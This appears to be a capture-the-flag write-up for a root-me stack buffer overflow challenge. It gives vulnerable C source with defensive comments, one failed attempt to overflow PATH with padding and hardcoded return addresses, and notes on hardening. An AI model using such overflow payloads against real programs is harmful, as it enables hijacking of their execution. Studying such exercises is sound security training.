ELF x86: Stack buffer overflow basic 4
root-me challenge: Can you return the env to me pleazzz?
Environment configuration:
- PIE (Position Independent Executable): No
- RelRO (Read Only relocations): No
- NX (Non-Executable Stack): No
- ASLR (Address Space Layout Randomisation): No
- SF (Source Fortification): No
- SSP (Stack-Smashing Protection): No
- SRC (Source code access): Yes
Source code:
#include <stdio.h>
#include <stdlib.h>
#include <dirent.h>
#include <string.h>
/*
 * Fixed-size copies of four environment variables, filled in by GetEnv().
 * Each field is a 128-byte array, so it can hold a string of at most 127
 * characters plus the terminating NUL. The fields are declared back to back,
 * so a write that runs past one field lands in the next one.
 */
struct EnvInfo
{
char home[128];      /* copy of HOME */
char username[128];  /* copy of USERNAME */
char shell[128];     /* copy of SHELL */
char path[128];      /* copy of PATH; last field of the struct */
};
/*
 * Reads HOME, USERNAME, SHELL and PATH (in that order) from the process
 * environment and returns them by value in a struct EnvInfo.
 *
 * If any of the four variables is unset, a message is printed and the
 * process ends through exit(0), so a caller only ever receives a struct in
 * which all four copies were attempted. Note that the exit status is 0 even
 * on this failure path.
 *
 * SECURITY: every copy below is an unbounded strcpy() into a 128-byte field.
 * Environment values are chosen by whoever launches the process, so they are
 * untrusted input. A value of 128 characters or more is written past the end
 * of its field, into the following fields and, if long enough, past the end
 * of the local struct itself, which is undefined behaviour (an out-of-bounds
 * write in this function's automatic storage). A hardened version bounds
 * each copy to the destination size and rejects over-long values, e.g.
 *     n = snprintf(env.home, sizeof env.home, "%s", ptr);
 *     if (n < 0 || (size_t)n >= sizeof env.home) { report and fail }
 */
struct EnvInfo GetEnv(void)
{
/* Local (automatic) result object; returned by value at the end. */
struct EnvInfo env;
char *ptr;
if((ptr = getenv("HOME")) == NULL)
{
printf("[-] Can't find HOME.\n");
exit(0);
}
/* No length check: strlen(ptr) is never compared with sizeof env.home. */
strcpy(env.home, ptr);
if((ptr = getenv("USERNAME")) == NULL)
{
printf("[-] Can't find USERNAME.\n");
exit(0);
}
/* Same unbounded copy as above, into env.username. */
strcpy(env.username, ptr);
if((ptr = getenv("SHELL")) == NULL)
{
printf("[-] Can't find SHELL.\n");
exit(0);
}
/* Same unbounded copy as above, into env.shell. */
strcpy(env.shell, ptr);
if((ptr = getenv("PATH")) == NULL)
{
printf("[-] Can't find PATH.\n");
exit(0);
}
/* env.path is the last field, so an over-long PATH runs off the end of env. */
strcpy(env.path, ptr);
return env;
}
/*
 * Entry point: collects the four environment values through GetEnv() and
 * prints each one on its own line. Returns 0.
 *
 * main() does no validation of its own; it relies entirely on GetEnv(),
 * which either returns a struct or ends the process.
 */
int main(void)
{
struct EnvInfo env;
printf("[+] Getting env...\n");
/* The struct is returned by value and assigned into main's own copy. */
env = GetEnv();
/* %s prints up to the first NUL byte found in each field. */
printf("HOME = %s\n", env.home);
printf("USERNAME = %s\n", env.username);
printf("SHELL = %s\n", env.shell);
printf("PATH = %s\n", env.path);
return 0;
}
app-systeme-ch8@challenge02:~$ export PATH=$PATH:`python -c "print 'A'*160 + '\x31\xf9\xff\xbf' + '\x2b\xfb\xff\xbf'"`
app-systeme-ch8@challenge02:~$ ./ch8
[+] Getting env...
[-] Can't find USERNAME.
Need to think some more …
Resources
Buffer Overflow ou explication de “une faille de type bufferoverflow”
Runtime Attacks : Buffer OverFlow and Return Oriented Programming
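Counter moves
This variant works through input constraints on the overflow. Compiler hardening such as FORTIFY (the `_FORTIFY_SOURCE` checks, listed as "Source Fortification" in the environment table) narrows the room; in this challenge it is switched off, together with NX, ASLR and stack-smashing protection. In the source itself, the root cause is the unbounded `strcpy()` of environment values into 128-byte fields, and the fix is to bound each copy to the size of its destination and reject values that do not fit. The defender’s view is in the blue notes on memory corruption and its limits.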